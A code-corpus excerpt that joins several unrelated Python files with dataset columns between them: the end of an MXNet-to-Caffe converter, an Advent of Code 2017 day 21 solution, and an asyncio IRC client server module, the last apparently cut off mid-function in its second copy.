parser.add_argument("epoch", type=int,
help="epoch number of mxnet model")
parser.add_argument("caffe_prototxt", type=str,
help="filename of caffe deploy prototxt")
parser.add_argument("caffemodel_name", type=str,
help="Name of caffe weights file to save")
args = parser.parse_args()
MxNetToCaffe(args.prefix, args.epoch, args.caffe_prototxt, args.caffemodel_name) | 0.794265 | 0.309963 |
import common
import numpy as np
data = common.read_file('2017/21/data.txt')
lines = data.splitlines()
repetitions = 5 # part 1
repetitions = 18 # part 2
def parse_rule(rule):
segments = rule.split(' ')
pattern_lines = segments[0].split('/')
result_lines = segments[2].split('/')
def interpret_characters(lines):
return [
[1 if x == '#' else 0 for x in line]
for line in lines
]
pattern_lines = interpret_characters(pattern_lines)
result_lines = interpret_characters(result_lines)
return len(pattern_lines), np.array(pattern_lines), np.array(result_lines)
all_rules = [parse_rule(x) for x in lines]
def transform_rules(rules):
for rule in rules:
yield rule
rot = np.rot90(rule[1])
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
flipped = np.fliplr(rule[1])
yield (rule[0], flipped, rule[2])
rot = np.rot90(flipped)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
all_rules = list(transform_rules(all_rules))
rules_2 = [x for x in all_rules if x[0] == 2]
rules_3 = [x for x in all_rules if x[0] == 3]
def eq(w1: np.ndarray, w2: np.ndarray):
return (w1 == w2).all()
board = np.array([[0, 1, 0], [0, 0, 1], [1, 1, 1]])
for i in range(repetitions):
print(i)
side = 2 if (len(board) % 2) == 0 else 3
rules = rules_2 if side == 2 else rules_3
new_side = side + 1
new_len = len(board) + int(len(board) / side)
result = np.zeros((new_len, new_len))
for y in range(0, int(len(board) / side)):
for x in range(0, int(len(board) / side)):
_y = y * side
_x = x * side
__y = y * new_side
__x = x * new_side
slc = board[_y:_y + side, _x:_x + side]
# NOTE: this is kinda slow, bot got me the result in under 5min, so I'm leaving it
for r in rules:
if eq(r[1], slc):
result[__y:__y + new_side, __x:__x + new_side] = r[2]
break
board = result
print(np.count_nonzero(board)) | 2017/21/solution.py | import common
import numpy as np
data = common.read_file('2017/21/data.txt')
lines = data.splitlines()
repetitions = 5 # part 1
repetitions = 18 # part 2
def parse_rule(rule):
segments = rule.split(' ')
pattern_lines = segments[0].split('/')
result_lines = segments[2].split('/')
def interpret_characters(lines):
return [
[1 if x == '#' else 0 for x in line]
for line in lines
]
pattern_lines = interpret_characters(pattern_lines)
result_lines = interpret_characters(result_lines)
return len(pattern_lines), np.array(pattern_lines), np.array(result_lines)
all_rules = [parse_rule(x) for x in lines]
def transform_rules(rules):
for rule in rules:
yield rule
rot = np.rot90(rule[1])
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
flipped = np.fliplr(rule[1])
yield (rule[0], flipped, rule[2])
rot = np.rot90(flipped)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
rot = np.rot90(rot)
yield (rule[0], rot, rule[2])
all_rules = list(transform_rules(all_rules))
rules_2 = [x for x in all_rules if x[0] == 2]
rules_3 = [x for x in all_rules if x[0] == 3]
def eq(w1: np.ndarray, w2: np.ndarray):
return (w1 == w2).all()
board = np.array([[0, 1, 0], [0, 0, 1], [1, 1, 1]])
for i in range(repetitions):
print(i)
side = 2 if (len(board) % 2) == 0 else 3
rules = rules_2 if side == 2 else rules_3
new_side = side + 1
new_len = len(board) + int(len(board) / side)
result = np.zeros((new_len, new_len))
for y in range(0, int(len(board) / side)):
for x in range(0, int(len(board) / side)):
_y = y * side
_x = x * side
__y = y * new_side
__x = x * new_side
slc = board[_y:_y + side, _x:_x + side]
# NOTE: this is kinda slow, bot got me the result in under 5min, so I'm leaving it
for r in rules:
if eq(r[1], slc):
result[__y:__y + new_side, __x:__x + new_side] = r[2]
break
board = result
print(np.count_nonzero(board)) | 0.272702 | 0.458652 |
import asyncio
from asyncio import Future, PriorityQueue
from typing import (AsyncIterable, Awaitable, Deque, Dict, Iterable, List,
Optional, Set, Tuple, Union)
from collections import deque
from time import monotonic
import anyio
from asyncio_rlock import RLock
from asyncio_throttle import Throttler
from async_timeout import timeout as timeout_
from ircstates import Emit, Channel, ChannelUser
from ircstates.numerics import *
from ircstates.server import ServerDisconnectedException
from ircstates.names import Name
from irctokens import build, Line, tokenise
from .ircv3 import (CAPContext, sts_transmute, CAP_ECHO, CAP_SASL,
CAP_LABEL, LABEL_TAG_MAP, resume_transmute)
from .sasl import SASLContext, SASLResult
from .matching import (ResponseOr, Responses, Response, ANY, SELF, MASK_SELF,
Folded)
from .asyncs import MaybeAwait, WaitFor
from .struct import Whois
from .params import ConnectionParams, SASLParams, STSPolicy, ResumePolicy
from .interface import (IBot, ICapability, IServer, SentLine, SendPriority,
IMatchResponse)
from .interface import ITCPTransport, ITCPReader, ITCPWriter
THROTTLE_RATE = 4 # lines
THROTTLE_TIME = 2 # seconds
PING_TIMEOUT = 60 # seconds
WAIT_TIMEOUT = 20 # seconds
JOIN_ERR_FIRST = [
ERR_NOSUCHCHANNEL,
ERR_BADCHANNAME,
ERR_UNAVAILRESOURCE,
ERR_TOOMANYCHANNELS,
ERR_BANNEDFROMCHAN,
ERR_INVITEONLYCHAN,
ERR_BADCHANNELKEY,
ERR_NEEDREGGEDNICK,
ERR_THROTTLE
]
class Server(IServer):
_reader: ITCPReader
_writer: ITCPWriter
params: ConnectionParams
def __init__(self, bot: IBot, name: str):
super().__init__(name)
self.bot = bot
self.disconnected = False
self.throttle = Throttler(rate_limit=100, period=1)
self.sasl_state = SASLResult.NONE
self.last_read = monotonic()
self._sent_count: int = 0
self._send_queue: PriorityQueue[SentLine] = PriorityQueue()
self.desired_caps: Set[ICapability] = set([])
self._read_queue: Deque[Line] = deque()
self._process_queue: Deque[Tuple[Line, Optional[Emit]]] = deque()
self._ping_sent = False
self._read_lguard = RLock()
self.read_lock = self._read_lguard
self._read_lwork = asyncio.Lock()
self._wait_for = asyncio.Event()
self._pending_who: Deque[str] = deque()
self._alt_nicks: List[str] = []
def hostmask(self) -> str:
hostmask = self.nickname
if not self.username is None:
hostmask += f"!{self.username}"
if not self.hostname is None:
hostmask += f"@{self.hostname}"
return hostmask
def send_raw(self, line: str, priority=SendPriority.DEFAULT
) -> Awaitable[SentLine]:
return self.send(tokenise(line), priority)
def send(self,
line: Line,
priority=SendPriority.DEFAULT
) -> Awaitable[SentLine]:
self.line_presend(line)
sent_line = SentLine(self._sent_count, priority, line)
self._sent_count += 1
label = self.cap_available(CAP_LABEL)
if not label is None:
tag = LABEL_TAG_MAP[label]
if line.tags is None or not tag in line.tags:
if line.tags is None:
line.tags = {}
line.tags[tag] = str(sent_line.id)
self._send_queue.put_nowait(sent_line)
return sent_line.future
def set_throttle(self, rate: int, time: float):
self.throttle.rate_limit = rate
self.throttle.period = time
def server_address(self) -> Tuple[str, int]:
return self._writer.get_peer()
async def connect(self,
transport: ITCPTransport,
params: ConnectionParams):
await sts_transmute(params)
await resume_transmute(params)
reader, writer = await transport.connect(
params.host,
params.port,
tls =params.tls,
bindhost =params.bindhost)
self._reader = reader
self._writer = writer
self.params = params
await self.handshake()
async def disconnect(self):
if not self._writer is None:
await self._writer.close()
self._writer = None
self._read_queue.clear()
async def handshake(self):
nickname = self.params.nickname
username = self.params.username or nickname
realname = self.params.realname or nickname
alt_nicks = self.params.alt_nicknames
if not alt_nicks:
alt_nicks = [nickname+"_"*i for i in range(1, 4)]
self._alt_nicks = alt_nicks
# these must remain non-awaited; reading hasn't started yet
if not self.params.password is None:
self.send(build("PASS", [self.params.password]))
self.send(build("CAP", ["LS", "302"]))
self.send(build("NICK", [nickname]))
self.send(build("USER", [username, "0", "*", realname]))
# to be overridden
def line_preread(self, line: Line):
pass
def line_presend(self, line: Line):
pass
async def line_read(self, line: Line):
pass
async def line_send(self, line: Line):
pass
async def sts_policy(self, sts: STSPolicy):
pass
async def resume_policy(self, resume: ResumePolicy):
pass
# /to be overriden
async def _on_read(self, line: Line, emit: Optional[Emit]):
if line.command == "PING":
await self.send(build("PONG", line.params))
elif line.command == RPL_ENDOFWHO:
chan = self.casefold(line.params[1])
if (self._pending_who and
self._pending_who[0] == chan):
self._pending_who.popleft()
await self._next_who()
elif (line.command in {
ERR_NICKNAMEINUSE, ERR_ERRONEUSNICKNAME, ERR_UNAVAILRESOURCE
} and not self.registered):
if self._alt_nicks:
nick = self._alt_nicks.pop(0)
await self.send(build("NICK", [nick]))
else:
await self.send(build("QUIT"))
elif line.command in [RPL_ENDOFMOTD, ERR_NOMOTD]:
# we didn't get the nickname we wanted. watch for it if we can
if not self.nickname == self.params.nickname:
target = self.params.nickname
if self.isupport.monitor is not None:
await self.send(build("MONITOR", ["+", target]))
elif self.isupport.watch is not None:
await self.send(build("WATCH", [f"+{target}"]))
# has someone just stopped using the nickname we want?
elif line.command == RPL_LOGOFF:
await self._check_regain([line.params[1]])
elif line.command == RPL_MONOFFLINE:
await self._check_regain(line.params[1].split(","))
elif (line.command in ["NICK", "QUIT"] and
line.source is not None):
await self._check_regain([line.hostmask.nickname])
elif emit is not None:
if emit.command == RPL_WELCOME:
await self.send(build("WHO", [self.nickname]))
self.set_throttle(THROTTLE_RATE, THROTTLE_TIME)
if self.params.autojoin:
await self._batch_joins(self.params.autojoin)
elif emit.command == "CAP":
if emit.subcommand == "NEW":
await self._cap_ls(emit)
elif (emit.subcommand == "LS" and
emit.finished):
if not self.registered:
await CAPContext(self).handshake()
else:
await self._cap_ls(emit)
elif emit.command == "JOIN":
if emit.self and not emit.channel is None:
chan = emit.channel.name_lower
await self.send(build("MODE", [chan]))
modes = "".join(self.isupport.chanmodes.a_modes)
await self.send(build("MODE", [chan, f"+{modes}"]))
self._pending_who.append(chan)
if len(self._pending_who) == 1:
await self._next_who()
await self.line_read(line)
async def _check_regain(self, nicks: List[str]):
for nick in nicks:
if (self.casefold_equals(nick, self.params.nickname) and
not self.nickname == self.params.nickname):
await self.send(build("NICK", [self.params.nickname]))
async def _batch_joins(self,
channels: List[str],
batch_n: int=10):
#TODO: do as many JOINs in one line as we can fit
#TODO: channel keys
for i in range(0, len(channels), batch_n):
batch = channels[i:i+batch_n]
await self.send(build("JOIN", [",".join(batch)]))
async def _next_who(self):
if self._pending_who:
chan = self._pending_who[0]
if self.isupport.whox:
await self.send(self.prepare_whox(chan))
else:
await self.send(build("WHO", [chan]))
async def _read_line(self, timeout: float) -> Optional[Line]:
while True:
if self._read_queue:
return self._read_queue.popleft()
try:
async with timeout_(timeout):
data = await self._reader.read(1024)
except asyncio.TimeoutError:
return None
self.last_read = monotonic()
lines = self.recv(data)
for line in lines:
self.line_preread(line)
self._read_queue.append(line)
async def _read_lines(self):
while True:
async with self._read_lguard:
pass
if not self._process_queue:
async with self._read_lwork:
read_aw = self._read_line(PING_TIMEOUT)
dones, notdones = await asyncio.wait(
[read_aw, self._wait_for.wait()],
return_when=asyncio.FIRST_COMPLETED
)
self._wait_for.clear()
for done in dones:
if isinstance(done.result(), Line):
self._ping_sent = False
line = done.result()
emit = self.parse_tokens(line)
self._process_queue.append((line, emit))
elif done.result() is None:
if not self._ping_sent:
await self.send(build("PING", ["hello"]))
self._ping_sent = True
else:
await self.disconnect()
raise ServerDisconnectedException()
for notdone in notdones:
notdone.cancel()
else:
line, emit = self._process_queue.popleft()
await self._on_read(line, emit)
async def wait_for(self,
response: Union[IMatchResponse, Set[IMatchResponse]],
sent_aw: Optional[Awaitable[SentLine]]=None,
timeout: float=WAIT_TIMEOUT
) -> Line:
response_obj: IMatchResponse
if isinstance(response, set):
response_obj = ResponseOr(*response)
else:
response_obj = response
async with self._read_lguard:
self._wait_for.set()
async with self._read_lwork:
async with timeout_(timeout):
while True:
line = await self._read_line(timeout)
if line:
self._ping_sent = False
emit = self.parse_tokens(line)
self._process_queue.append((line, emit))
if response_obj.match(self, line):
return line
async def _on_send_line(self, line: Line):
if (line.command in ["PRIVMSG", "NOTICE", "TAGMSG"] and
not self.cap_agreed(CAP_ECHO)):
new_line = line.with_source(self.hostmask())
self._read_queue.append(new_line)
async def _send_lines(self):
while True:
lines: List[SentLine] = []
while (not lines or
(len(lines) < 5 and self._send_queue.qsize() > 0)):
prio_line = await self._send_queue.get()
lines.append(prio_line)
for line in lines:
async with self.throttle:
self._writer.write(
f"{line.line.format()}\r\n".encode("utf8"))
await self._writer.drain()
for line in lines:
await self._on_send_line(line.line)
await self.line_send(line.line)
line.future.set_result(line)
# CAP-related
def cap_agreed(self, capability: ICapability) -> bool:
return bool(self.cap_available(capability))
def cap_available(self, capability: ICapability) -> Optional[str]:
return capability.available(self.agreed_caps)
async def _cap_ls(self, emit: Emit):
if not emit.tokens is None:
tokens: Dict[str, str] = {}
for token in emit.tokens:
key, _, value = token.partition("=")
tokens[key] = value
await CAPContext(self).on_ls(tokens)
async def sasl_auth(self, params: SASLParams) -> bool:
if (self.sasl_state == SASLResult.NONE and
self.cap_agreed(CAP_SASL)):
res = await SASLContext(self).from_params(params)
self.sasl_state = res
return True
else:
return False
# /CAP-related
def send_nick(self, new_nick: str) -> Awaitable[bool]:
fut = self.send(build("NICK", [new_nick]))
async def _assure() -> bool:
line = await self.wait_for({
Response("NICK", [Folded(new_nick)], source=MASK_SELF),
Responses([
ERR_BANNICKCHANGE,
ERR_NICKTOOFAST,
ERR_CANTCHANGENICK
], [ANY]),
Responses([
ERR_NICKNAMEINUSE,
ERR_ERRONEUSNICKNAME,
ERR_UNAVAILRESOURCE
], [ANY, Folded(new_nick)])
}, fut)
return line.command == "NICK"
return MaybeAwait(_assure)
def send_join(self,
name: str,
key: Optional[str]=None
) -> Awaitable[Channel]:
fut = self.send_joins([name], [] if key is None else [key])
async def _assure():
channels = await fut
return channels[0]
return MaybeAwait(_assure)
def send_part(self, name: str):
fut = self.send(build("PART", [name]))
async def _assure():
line = await self.wait_for(
Response("PART", [Folded(name)], source=MASK_SELF),
fut
)
return
return MaybeAwait(_assure)
def send_joins(self,
names: List[str],
keys: List[str]=[]
) -> Awaitable[List[Channel]]:
folded_names = [self.casefold(name) for name in names]
if not keys:
fut = self.send(build("JOIN", [",".join(names)]))
else:
fut = self.send(build("JOIN", [",".join(names)]+keys))
async def _assure():
channels: List[Channel] = []
while folded_names:
line = await self.wait_for({
Response(RPL_CHANNELMODEIS, [ANY, ANY]),
Responses(JOIN_ERR_FIRST, [ANY, ANY]),
Response(ERR_USERONCHANNEL, [ANY, SELF, ANY]),
Response(ERR_LINKCHANNEL, [ANY, ANY, ANY])
}, fut)
chan: Optional[str] = None
if line.command == RPL_CHANNELMODEIS:
chan = line.params[1]
elif line.command in JOIN_ERR_FIRST:
chan = line.params[1]
elif line.command == ERR_USERONCHANNEL:
chan = line.params[2]
elif line.command == ERR_LINKCHANNEL:
#XXX i dont like this
chan = line.params[2]
await self.wait_for(
Response(RPL_CHANNELMODEIS, [ANY, Folded(chan)])
)
channels.append(self.channels[self.casefold(chan)])
continue
if chan is not None:
folded = self.casefold(chan)
if folded in folded_names:
folded_names.remove(folded)
channels.append(self.channels[folded])
return channels
return MaybeAwait(_assure)
def send_message(self, target: str, message: str
) -> Awaitable[Optional[str]]:
fut = self.send(build("PRIVMSG", [target, message]))
async def _assure():
line = await self.wait_for(
Response("PRIVMSG", [Folded(target), ANY], source=MASK_SELF),
fut
)
if line.command == "PRIVMSG":
return line.params[1]
else:
return None
return MaybeAwait(_assure)
def send_whois(self,
target: str,
remote: bool=False
) -> Awaitable[Optional[Whois]]:
args = [target]
if remote:
args.append(target)
fut = self.send(build("WHOIS", args))
async def _assure() -> Optional[Whois]:
folded = self.casefold(target)
params = [ANY, Folded(folded)]
obj = Whois()
while True:
line = await self.wait_for(Responses([
ERR_NOSUCHNICK,
ERR_NOSUCHSERVER,
RPL_WHOISUSER,
RPL_WHOISSERVER,
RPL_WHOISOPERATOR,
RPL_WHOISIDLE,
RPL_WHOISCHANNELS,
RPL_WHOISHOST,
RPL_WHOISACCOUNT,
RPL_WHOISSECURE,
RPL_ENDOFWHOIS
], params), fut)
if line.command in [ERR_NOSUCHNICK, ERR_NOSUCHSERVER]:
return None
elif line.command == RPL_WHOISUSER:
nick, user, host, _, real = line.params[1:]
obj.nickname = nick
obj.username = user
obj.hostname = host
obj.realname = real
elif line.command == RPL_WHOISIDLE:
idle, signon, _ = line.params[2:]
obj.idle = int(idle)
obj.signon = int(signon)
elif line.command == RPL_WHOISACCOUNT:
obj.account = line.params[2]
elif line.command == RPL_WHOISCHANNELS:
channels = list(filter(bool, line.params[2].split(" ")))
if obj.channels is None:
obj.channels = []
for i, channel in enumerate(channels):
symbols = ""
while channel[0] in self.isupport.prefix.prefixes:
symbols += channel[0]
channel = channel[1:]
channel_user = ChannelUser(
Name(obj.nickname, folded),
Name(channel, self.casefold(channel))
)
for symbol in symbols:
mode = self.isupport.prefix.from_prefix(symbol)
if mode is not None:
channel_user.modes.add(mode)
obj.channels.append(channel_user)
elif line.command == RPL_ENDOFWHOIS:
return obj
return MaybeAwait(_assure) | ircrobots/server.py | import asyncio
from asyncio import Future, PriorityQueue
from typing import (AsyncIterable, Awaitable, Deque, Dict, Iterable, List,
Optional, Set, Tuple, Union)
from collections import deque
from time import monotonic
import anyio
from asyncio_rlock import RLock
from asyncio_throttle import Throttler
from async_timeout import timeout as timeout_
from ircstates import Emit, Channel, ChannelUser
from ircstates.numerics import *
from ircstates.server import ServerDisconnectedException
from ircstates.names import Name
from irctokens import build, Line, tokenise
from .ircv3 import (CAPContext, sts_transmute, CAP_ECHO, CAP_SASL,
CAP_LABEL, LABEL_TAG_MAP, resume_transmute)
from .sasl import SASLContext, SASLResult
from .matching import (ResponseOr, Responses, Response, ANY, SELF, MASK_SELF,
Folded)
from .asyncs import MaybeAwait, WaitFor
from .struct import Whois
from .params import ConnectionParams, SASLParams, STSPolicy, ResumePolicy
from .interface import (IBot, ICapability, IServer, SentLine, SendPriority,
IMatchResponse)
from .interface import ITCPTransport, ITCPReader, ITCPWriter
THROTTLE_RATE = 4 # lines
THROTTLE_TIME = 2 # seconds
PING_TIMEOUT = 60 # seconds
WAIT_TIMEOUT = 20 # seconds
JOIN_ERR_FIRST = [
ERR_NOSUCHCHANNEL,
ERR_BADCHANNAME,
ERR_UNAVAILRESOURCE,
ERR_TOOMANYCHANNELS,
ERR_BANNEDFROMCHAN,
ERR_INVITEONLYCHAN,
ERR_BADCHANNELKEY,
ERR_NEEDREGGEDNICK,
ERR_THROTTLE
]
class Server(IServer):
_reader: ITCPReader
_writer: ITCPWriter
params: ConnectionParams
def __init__(self, bot: IBot, name: str):
super().__init__(name)
self.bot = bot
self.disconnected = False
self.throttle = Throttler(rate_limit=100, period=1)
self.sasl_state = SASLResult.NONE
self.last_read = monotonic()
self._sent_count: int = 0
self._send_queue: PriorityQueue[SentLine] = PriorityQueue()
self.desired_caps: Set[ICapability] = set([])
self._read_queue: Deque[Line] = deque()
self._process_queue: Deque[Tuple[Line, Optional[Emit]]] = deque()
self._ping_sent = False
self._read_lguard = RLock()
self.read_lock = self._read_lguard
self._read_lwork = asyncio.Lock()
self._wait_for = asyncio.Event()
self._pending_who: Deque[str] = deque()
self._alt_nicks: List[str] = []
def hostmask(self) -> str:
hostmask = self.nickname
if not self.username is None:
hostmask += f"!{self.username}"
if not self.hostname is None:
hostmask += f"@{self.hostname}"
return hostmask
def send_raw(self, line: str, priority=SendPriority.DEFAULT
) -> Awaitable[SentLine]:
return self.send(tokenise(line), priority)
def send(self,
line: Line,
priority=SendPriority.DEFAULT
) -> Awaitable[SentLine]:
self.line_presend(line)
sent_line = SentLine(self._sent_count, priority, line)
self._sent_count += 1
label = self.cap_available(CAP_LABEL)
if not label is None:
tag = LABEL_TAG_MAP[label]
if line.tags is None or not tag in line.tags:
if line.tags is None:
line.tags = {}
line.tags[tag] = str(sent_line.id)
self._send_queue.put_nowait(sent_line)
return sent_line.future
def set_throttle(self, rate: int, time: float):
self.throttle.rate_limit = rate
self.throttle.period = time
def server_address(self) -> Tuple[str, int]:
return self._writer.get_peer()
async def connect(self,
transport: ITCPTransport,
params: ConnectionParams):
await sts_transmute(params)
await resume_transmute(params)
reader, writer = await transport.connect(
params.host,
params.port,
tls =params.tls,
bindhost =params.bindhost)
self._reader = reader
self._writer = writer
self.params = params
await self.handshake()
async def disconnect(self):
if not self._writer is None:
await self._writer.close()
self._writer = None
self._read_queue.clear()
async def handshake(self):
nickname = self.params.nickname
username = self.params.username or nickname
realname = self.params.realname or nickname
alt_nicks = self.params.alt_nicknames
if not alt_nicks:
alt_nicks = [nickname+"_"*i for i in range(1, 4)]
self._alt_nicks = alt_nicks
# these must remain non-awaited; reading hasn't started yet
if not self.params.password is None:
self.send(build("PASS", [self.params.password]))
self.send(build("CAP", ["LS", "302"]))
self.send(build("NICK", [nickname]))
self.send(build("USER", [username, "0", "*", realname]))
# to be overridden
def line_preread(self, line: Line):
pass
def line_presend(self, line: Line):
pass
async def line_read(self, line: Line):
pass
async def line_send(self, line: Line):
pass
async def sts_policy(self, sts: STSPolicy):
pass
async def resume_policy(self, resume: ResumePolicy):
pass
# /to be overriden
async def _on_read(self, line: Line, emit: Optional[Emit]):
if line.command == "PING":
await self.send(build("PONG", line.params))
elif line.command == RPL_ENDOFWHO:
chan = self.casefold(line.params[1])
if (self._pending_who and
self._pending_who[0] == chan):
self._pending_who.popleft()
await self._next_who()
elif (line.command in {
ERR_NICKNAMEINUSE, ERR_ERRONEUSNICKNAME, ERR_UNAVAILRESOURCE
} and not self.registered):
if self._alt_nicks:
nick = self._alt_nicks.pop(0)
await self.send(build("NICK", [nick]))
else:
await self.send(build("QUIT"))
elif line.command in [RPL_ENDOFMOTD, ERR_NOMOTD]:
# we didn't get the nickname we wanted. watch for it if we can
if not self.nickname == self.params.nickname:
target = self.params.nickname
if self.isupport.monitor is not None:
await self.send(build("MONITOR", ["+", target]))
elif self.isupport.watch is not None:
await self.send(build("WATCH", [f"+{target}"]))
# has someone just stopped using the nickname we want?
elif line.command == RPL_LOGOFF:
await self._check_regain([line.params[1]])
elif line.command == RPL_MONOFFLINE:
await self._check_regain(line.params[1].split(","))
elif (line.command in ["NICK", "QUIT"] and
line.source is not None):
await self._check_regain([line.hostmask.nickname])
elif emit is not None:
if emit.command == RPL_WELCOME:
await self.send(build("WHO", [self.nickname]))
self.set_throttle(THROTTLE_RATE, THROTTLE_TIME)
if self.params.autojoin:
await self._batch_joins(self.params.autojoin)
elif emit.command == "CAP":
if emit.subcommand == "NEW":
await self._cap_ls(emit)
elif (emit.subcommand == "LS" and
emit.finished):
if not self.registered:
await CAPContext(self).handshake()
else:
await self._cap_ls(emit)
elif emit.command == "JOIN":
if emit.self and not emit.channel is None:
chan = emit.channel.name_lower
await self.send(build("MODE", [chan]))
modes = "".join(self.isupport.chanmodes.a_modes)
await self.send(build("MODE", [chan, f"+{modes}"]))
self._pending_who.append(chan)
if len(self._pending_who) == 1:
await self._next_who()
await self.line_read(line)
async def _check_regain(self, nicks: List[str]):
for nick in nicks:
if (self.casefold_equals(nick, self.params.nickname) and
not self.nickname == self.params.nickname):
await self.send(build("NICK", [self.params.nickname]))
async def _batch_joins(self,
channels: List[str],
batch_n: int=10):
#TODO: do as many JOINs in one line as we can fit
#TODO: channel keys
for i in range(0, len(channels), batch_n):
batch = channels[i:i+batch_n]
await self.send(build("JOIN", [",".join(batch)]))
async def _next_who(self):
if self._pending_who:
chan = self._pending_who[0]
if self.isupport.whox:
await self.send(self.prepare_whox(chan))
else:
await self.send(build("WHO", [chan]))
async def _read_line(self, timeout: float) -> Optional[Line]:
while True:
if self._read_queue:
return self._read_queue.popleft()
try:
async with timeout_(timeout):
data = await self._reader.read(1024)
except asyncio.TimeoutError:
return None
self.last_read = monotonic()
lines = self.recv(data)
for line in lines:
self.line_preread(line)
self._read_queue.append(line)
async def _read_lines(self):
while True:
async with self._read_lguard:
pass
if not self._process_queue:
async with self._read_lwork:
read_aw = self._read_line(PING_TIMEOUT)
dones, notdones = await asyncio.wait(
[read_aw, self._wait_for.wait()],
return_when=asyncio.FIRST_COMPLETED
)
self._wait_for.clear()
for done in dones:
if isinstance(done.result(), Line):
self._ping_sent = False
line = done.result()
emit = self.parse_tokens(line)
self._process_queue.append((line, emit))
elif done.result() is None:
if not self._ping_sent:
await self.send(build("PING", ["hello"]))
self._ping_sent = True
else:
await self.disconnect()
raise ServerDisconnectedException()
for notdone in notdones:
notdone.cancel()
else:
line, emit = self._process_queue.popleft()
await self._on_read(line, emit)
async def wait_for(self,
response: Union[IMatchResponse, Set[IMatchResponse]],
sent_aw: Optional[Awaitable[SentLine]]=None,
timeout: float=WAIT_TIMEOUT
) -> Line:
response_obj: IMatchResponse
if isinstance(response, set):
response_obj = ResponseOr(*response)
else:
response_obj = response
async with self._read_lguard:
self._wait_for.set()
async with self._read_lwork:
async with timeout_(timeout):
while True:
line = await self._read_line(timeout)
if line:
self._ping_sent = False
emit = self.parse_tokens(line)
self._process_queue.append((line, emit))
if response_obj.match(self, line):
return line
async def _on_send_line(self, line: Line):
if (line.command in ["PRIVMSG", "NOTICE", "TAGMSG"] and
not self.cap_agreed(CAP_ECHO)):
new_line = line.with_source(self.hostmask())
self._read_queue.append(new_line)
async def _send_lines(self):
while True:
lines: List[SentLine] = []
while (not lines or
(len(lines) < 5 and self._send_queue.qsize() > 0)):
prio_line = await self._send_queue.get()
lines.append(prio_line)
for line in lines:
async with self.throttle:
self._writer.write(
f"{line.line.format()}\r\n".encode("utf8"))
await self._writer.drain()
for line in lines:
await self._on_send_line(line.line)
await self.line_send(line.line)
line.future.set_result(line)
# CAP-related
def cap_agreed(self, capability: ICapability) -> bool:
return bool(self.cap_available(capability))
def cap_available(self, capability: ICapability) -> Optional[str]:
return capability.available(self.agreed_caps)
async def _cap_ls(self, emit: Emit):
if not emit.tokens is None:
tokens: Dict[str, str] = {}
for token in emit.tokens:
key, _, value = token.partition("=")
tokens[key] = value
await CAPContext(self).on_ls(tokens)
async def sasl_auth(self, params: SASLParams) -> bool:
if (self.sasl_state == SASLResult.NONE and
self.cap_agreed(CAP_SASL)):
res = await SASLContext(self).from_params(params)
self.sasl_state = res
return True
else:
return False
# /CAP-related
def send_nick(self, new_nick: str) -> Awaitable[bool]:
fut = self.send(build("NICK", [new_nick]))
async def _assure() -> bool:
line = await self.wait_for({
Response("NICK", [Folded(new_nick)], source=MASK_SELF),
Responses([
ERR_BANNICKCHANGE,
ERR_NICKTOOFAST,
ERR_CANTCHANGENICK
], [ANY]),
Responses([
ERR_NICKNAMEINUSE,
ERR_ERRONEUSNICKNAME,
ERR_UNAVAILRESOURCE
], [ANY, Folded(new_nick)])
}, fut)
return line.command == "NICK"
return MaybeAwait(_assure)
def send_join(self,
name: str,
key: Optional[str]=None
) -> Awaitable[Channel]:
fut = self.send_joins([name], [] if key is None else [key])
async def _assure():
channels = await fut
return channels[0]
return MaybeAwait(_assure)
def send_part(self, name: str):
fut = self.send(build("PART", [name]))
async def _assure():
line = await self.wait_for(
Response("PART", [Folded(name)], source=MASK_SELF),
fut
)
return
return MaybeAwait(_assure)
def send_joins(self,
names: List[str],
keys: List[str]=[]
) -> Awaitable[List[Channel]]:
folded_names = [self.casefold(name) for name in names]
if not keys:
fut = self.send(build("JOIN", [",".join(names)]))
else:
fut = self.send(build("JOIN", [",".join(names)]+keys))
async def _assure():
channels: List[Channel] = []
while folded_names:
line = await self.wait_for({
Response(RPL_CHANNELMODEIS, [ANY, ANY]),
Responses(JOIN_ERR_FIRST, [ANY, ANY]),
Response(ERR_USERONCHANNEL, [ANY, SELF, ANY]),
Response(ERR_LINKCHANNEL, [ANY, ANY, ANY])
}, fut)
chan: Optional[str] = None
if line.command == RPL_CHANNELMODEIS:
chan = line.params[1]
elif line.command in JOIN_ERR_FIRST:
chan = line.params[1]
elif line.command == ERR_USERONCHANNEL:
chan = line.params[2]
elif line.command == ERR_LINKCHANNEL:
#XXX i dont like this
chan = line.params[2]
await self.wait_for(
Response(RPL_CHANNELMODEIS, [ANY, Folded(chan)])
)
channels.append(self.channels[self.casefold(chan)])
continue
if chan is not None:
folded = self.casefold(chan)
if folded in folded_names:
folded_names.remove(folded)
channels.append(self.channels[folded])
return channels
return MaybeAwait(_assure)
def send_message(self, target: str, message: str
) -> Awaitable[Optional[str]]:
fut = self.send(build("PRIVMSG", [target, message]))
async def _assure():
line = await self.wait_for(
Response("PRIVMSG", [Folded(target), ANY], source=MASK_SELF),
fut
)
if line.command == "PRIVMSG":
return line.params[1]
else:
return None
return MaybeAwait(_assure)
def send_whois(self,
target: str,
remote: bool=False
) -> Awaitable[Optional[Whois]]:
args = [target]
if remote:
args.append(target)
fut = self.send(build("WHOIS", args))
async def _assure() -> Optional[Whois]:
folded = self.casefold(target)
params = [ANY, Folded(folded)]
obj = Whois()
while True:
line = await self.wait_for(Responses([
ERR_NOSUCHNICK,
ERR_NOSUCHSERVER,
RPL_WHOISUSER,
RPL_WHOISSERVER,
RPL_WHOISOPERATOR,
RPL_WHOISIDLE,
RPL_WHOISCHANNELS,
RPL_WHOISHOST,
RPL_WHOISACCOUNT,
RPL_WHOISSECURE,
RPL_ENDOFWHOIS
], params), fut)
if line.command in [ERR_NOSUCHNICK, ERR_NOSUCHSERVER]:
return None
elif line.command == RPL_WHOISUSER:
nick, user, host, _, real = line.params[1:]
obj.nickname = nick
obj.username = user
obj.hostname = host
obj.realname = real
elif line.command == RPL_WHOISIDLE:
idle, signon, _ = line.params[2:]
obj.idle = int(idle)
